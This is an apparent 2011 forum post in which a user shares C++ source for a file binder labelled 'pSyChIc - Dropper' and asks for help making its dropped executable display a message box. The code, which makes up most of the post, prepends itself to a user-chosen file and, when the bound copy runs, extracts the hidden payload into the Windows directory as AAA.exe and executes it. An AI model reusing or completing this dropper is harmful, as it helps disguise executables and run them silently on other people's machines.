Ok, so I found some "malicious" code, It creates some exe in windir, but that exe is empty, so if you can, please suggest me how to write to that file MessageBox function.

Here's the code:
Code:
#include <iostream.h>
#include <fstream.h>
#include <windows.h>
#include <string.h>
int write(int mysize,char *tpath,char *mybuf)
{
    int tsize = 0;
    ifstream tfile(tpath,ios::binary);
    tfile.seekg (0,ios::end);
    tsize = tfile.tellg(); 
    tfile.seekg (0,ios::beg); 
    char tbuf[tsize];    
    tfile.read(tbuf,tsize);     
    tfile.close();     
    ofstream outputfile(tpath,ios::binary);     
    outputfile.write(mybuf,mysize);     
    outputfile.write(tbuf,tsize);     
    outputfile.close();     
    cout<<tpath<<endl; 
};    
  
void extract(int mysize,char *target)
{     
      char windir[250];
      GetWindowsDirectory(windir,MAX_PATH);     
      ifstream tfile(target,ios::binary);     
      tfile.seekg (427646);     
      int theamount = mysize - 427646;     
      char tbuf[theamount];     
      tfile.read(tbuf,theamount);     
      tfile.close();     
      char mypath[100];     
      strcpy (mypath,windir);     
      strcat (mypath,"\\AAA.exe");     
      ofstream outfile(mypath,ios::binary);     
      outfile.write(tbuf,theamount);     
      outfile.close();     
      cout<<mypath;     
      system(mypath); };  
         
int checkit(int mysize,char *mybuf,char *target)
{     
      int checker = 0;     
      char tpath[512];      
      if (mysize != 427646)     
      {     
            extract(mysize,target);
      }         
      else     
      {     
            cout<<"pSyChIc - Dropper"<<endl;
            cout<<"Input file path"<<endl;
            cin>>tpath;
            write (mysize,tpath,mybuf);
      }             
};      

int main(int argc, char *argv[]) 
{ 
    long mysize;
    char *target;
    target= argv[0];
    ifstream myfile(argv[0],ios::binary);
    myfile.seekg (0,ios::end);
    mysize = myfile.tellg();
    myfile.seekg (0,ios::beg); 
    char mybuf[mysize]; 
    myfile.read(mybuf,mysize); 
    myfile.close();    
    checkit (mysize,mybuf,target);
}
Do not care about some Check func or any other parts

I think this will be easier and more compatible than ur previous idea, but that was good too, only problem is that i don't know how to work with MFC ..., so please help me with this .

Last edited by Scripting; 28Apr2011 at 16:40..